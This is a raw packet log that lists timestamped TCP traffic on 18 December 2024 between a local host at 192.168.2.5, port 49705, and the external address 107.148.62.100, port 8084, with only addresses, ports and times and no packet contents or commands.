Dec 18, 2024 13:31:57.498622894 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.498626947 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.499278069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.499330997 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.499358892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.499399900 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.499969006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.500080109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.500123024 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.500718117 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.500799894 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.500839949 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.501471043 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.501632929 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.501822948 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.502326012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.502429008 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.503122091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.503185034 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.503207922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.504129887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.504173040 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.504338026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.504378080 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.505141973 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.505373001 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.505414009 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.506083012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.506100893 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.506158113 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.507006884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.507072926 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.507126093 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.507841110 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.507852077 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.507904053 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.508430004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.508507967 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.508557081 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.509176016 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.509218931 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.511003971 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.511015892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.511029959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.511058092 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.511066914 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.511080980 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.511104107 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.736052036 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736069918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736083984 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736100912 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736115932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736134052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736151934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736169100 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736186981 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736186028 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.736203909 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736217976 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736234903 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736248970 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736257076 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736268997 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.736270905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736289024 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736304045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736306906 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.736320972 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736336946 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736352921 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.736352921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736368895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736385107 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736391068 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.736408949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736413002 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.736430883 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736440897 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.736447096 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736464977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736474991 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.736479044 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736502886 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736509085 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.736520052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736536026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736552000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736567974 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.736569881 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736584902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.736598015 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.736628056 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.743614912 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.743633032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.743689060 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.751548052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.751565933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.751645088 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.756249905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.756273985 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.756314039 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.761046886 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.761068106 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.761084080 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.761104107 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.761131048 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.765580893 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.776181936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.776201010 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.776268005 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.779716015 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.779733896 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.779761076 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.784909964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.784959078 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.837654114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.837680101 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.837697029 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.837714911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.837729931 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.837747097 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.837749004 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.837779045 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.837795019 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.838810921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.838860989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.838876963 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.838893890 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.838908911 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.838937998 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.840254068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.840270996 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.840286016 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.840301991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.840317965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.840321064 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.840344906 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.841928959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.841969967 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.841985941 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.842001915 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.842022896 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.842047930 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.843627930 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.843655109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.843671083 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.843681097 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.843687057 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.843703032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.843714952 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.843750000 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.846765995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.846784115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.846868992 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.852540970 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.852556944 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.852572918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.852617979 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.852670908 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.852694988 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.852710962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.852714062 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.852726936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.852741003 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.852752924 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.852757931 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.852775097 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.852783918 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.852792978 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.852809906 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.857388020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.857404947 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.857419968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.857434034 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.857435942 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.857465029 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.861064911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.861080885 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.861112118 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.861398935 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.861442089 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.868891001 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.869035006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.869103909 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.869204998 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.871130943 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.871172905 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.871361017 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.876583099 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.876653910 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.876785040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.876935005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.876982927 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.882366896 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.882550001 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.882599115 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.882796049 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.886488914 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.886540890 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.886615038 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.887767076 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.887809992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.887835026 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.894371033 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.894418001 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.894443989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.894715071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.894754887 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.901014090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.901030064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.901078939 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.901253939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.901267052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.901308060 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.904038906 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.904052019 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.904109001 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.912877083 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.913129091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.913211107 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.913228035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.919433117 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.919497013 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.919594049 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.919964075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.920011044 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.929371119 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.929388046 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.929450989 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.929716110 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.931412935 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.931426048 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.931458950 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.933478117 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.933490992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.933527946 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.933655977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.933697939 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.933967113 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.937427044 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.937484026 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.937541962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.937870026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.937916994 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.942620039 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.942909956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.942934990 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.942965984 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.949477911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.949498892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.949532032 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.949620962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.949668884 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.949695110 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.955686092 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.955738068 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.955888033 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.956041098 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.956083059 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.960974932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.961059093 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.961142063 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.961247921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.014113903 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.017792940 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.019424915 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.019442081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.019474983 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.069545984 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.069565058 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.069624901 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.071867943 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.071938992 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.075124979 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.075898886 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.075953007 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.076956987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.082420111 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.082477093 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.083455086 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.084184885 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.084232092 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.089797974 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.090524912 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.090594053 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.091348886 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.097271919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.097327948 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.099281073 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.100303888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.100349903 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.102483034 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.102499962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.102565050 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.104310989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.108994007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.109044075 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.109613895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.109630108 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.109672070 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.110627890 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.110641003 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.110678911 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.113392115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.114289045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.114331961 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.118015051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.118042946 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.118089914 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.119517088 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.126919985 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.126935005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.126993895 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.128643036 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.128715992 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.142412901 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.143064976 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.143138885 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.143924952 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.145368099 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.145411968 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.147197962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.147214890 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.147263050 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.152703047 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.152719975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.152797937 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.154284000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.155949116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.155965090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.155989885 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.157161951 CET	8084	49705	107.148.62.100	192.168.2.5
